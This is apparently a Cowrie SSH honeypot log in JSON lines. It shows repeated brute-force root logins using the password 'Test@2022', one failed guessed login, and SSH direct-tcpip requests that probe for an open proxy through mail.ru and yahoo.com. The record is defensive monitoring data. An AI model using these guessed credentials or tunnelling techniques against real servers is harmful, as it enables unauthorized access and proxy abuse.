{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45744,"dst_ip":"1.2.3.4","dst_port":22,"session":"80497db614fc","protocol":"ssh","message":"New connection: 77.83.207.83:45744 (1.2.3.4:22) [session: 80497db614fc]","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.054756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.065049Z","src_ip":"77.83.207.83","session":"80497db614fc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.105160Z","src_ip":"77.83.207.83","session":"80497db614fc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.357203Z","src_ip":"77.83.207.83","session":"80497db614fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22476,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22476","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.408406Z","session":"80497db614fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.459775Z","src_ip":"77.83.207.83","session":"80497db614fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56384,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cf5fcb5bdf7","protocol":"ssh","message":"New connection: 212.227.235.229:56384 (1.2.3.4:22) [session: 9cf5fcb5bdf7]","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.478216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.479169Z","src_ip":"212.227.235.229","session":"9cf5fcb5bdf7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":22739,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:22739","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.600997Z","session":"80497db614fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.651678Z","src_ip":"77.83.207.83","session":"80497db614fc"}
{"eventid":"cowrie.session.closed","duration":"115.4","message":"Connection lost after 115.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.676685Z","src_ip":"212.227.235.229","session":"bd1015d61d58"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":1451,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:1451","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.792872Z","session":"80497db614fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.812532Z","src_ip":"212.227.235.229","session":"9cf5fcb5bdf7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.844621Z","src_ip":"77.83.207.83","session":"80497db614fc"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.882195Z","src_ip":"212.227.235.229","session":"3b19619092af"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.895412Z","src_ip":"77.83.207.83","session":"80497db614fc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45833,"dst_ip":"1.2.3.4","dst_port":22,"session":"28b1f539ab3a","protocol":"ssh","message":"New connection: 77.83.207.83:45833 (1.2.3.4:22) [session: 28b1f539ab3a]","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.943871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.954180Z","src_ip":"77.83.207.83","session":"28b1f539ab3a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.993386Z","src_ip":"77.83.207.83","session":"28b1f539ab3a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.240387Z","src_ip":"77.83.207.83","session":"28b1f539ab3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6727,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6727","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.291368Z","session":"28b1f539ab3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.340964Z","src_ip":"77.83.207.83","session":"28b1f539ab3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8505,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:8505","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.479997Z","session":"28b1f539ab3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.529584Z","src_ip":"77.83.207.83","session":"28b1f539ab3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":341,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:341","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.671970Z","session":"28b1f539ab3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.721643Z","src_ip":"77.83.207.83","session":"28b1f539ab3a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.772052Z","src_ip":"77.83.207.83","session":"28b1f539ab3a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45920,"dst_ip":"1.2.3.4","dst_port":22,"session":"72f66cc2b4c7","protocol":"ssh","message":"New connection: 77.83.207.83:45920 (1.2.3.4:22) [session: 72f66cc2b4c7]","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.822884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.823835Z","src_ip":"77.83.207.83","session":"72f66cc2b4c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:58.875219Z","src_ip":"77.83.207.83","session":"72f66cc2b4c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.130554Z","src_ip":"77.83.207.83","session":"72f66cc2b4c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15729,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15729","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.182875Z","session":"72f66cc2b4c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.234120Z","src_ip":"77.83.207.83","session":"72f66cc2b4c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":7935,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:7935","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.377515Z","session":"72f66cc2b4c7"}
{"eventid":"cowrie.login.failed","username":"dongxuewei","password":"dongxuewei123","message":"login attempt [dongxuewei/dongxuewei123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.415716Z","src_ip":"212.227.235.229","session":"9cf5fcb5bdf7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.428703Z","src_ip":"77.83.207.83","session":"72f66cc2b4c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":2707,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:2707","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.573531Z","session":"72f66cc2b4c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.624533Z","src_ip":"77.83.207.83","session":"72f66cc2b4c7"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.676409Z","src_ip":"77.83.207.83","session":"72f66cc2b4c7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46014,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3a8f48bfb85","protocol":"ssh","message":"New connection: 77.83.207.83:46014 (1.2.3.4:22) [session: e3a8f48bfb85]","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.725674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.736179Z","src_ip":"77.83.207.83","session":"e3a8f48bfb85"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:59.775967Z","src_ip":"77.83.207.83","session":"e3a8f48bfb85"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.027232Z","src_ip":"77.83.207.83","session":"e3a8f48bfb85"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30109,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30109","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.078999Z","session":"e3a8f48bfb85"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.129349Z","src_ip":"77.83.207.83","session":"e3a8f48bfb85"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":28373,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:28373","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.272696Z","session":"e3a8f48bfb85"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.323249Z","src_ip":"77.83.207.83","session":"e3a8f48bfb85"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":30511,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:30511","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.464512Z","session":"e3a8f48bfb85"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.514877Z","src_ip":"77.83.207.83","session":"e3a8f48bfb85"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.565959Z","src_ip":"77.83.207.83","session":"e3a8f48bfb85"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46107,"dst_ip":"1.2.3.4","dst_port":22,"session":"389ab50d5b9e","protocol":"ssh","message":"New connection: 77.83.207.83:46107 (1.2.3.4:22) [session: 389ab50d5b9e]","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.613950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.615072Z","src_ip":"77.83.207.83","session":"389ab50d5b9e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-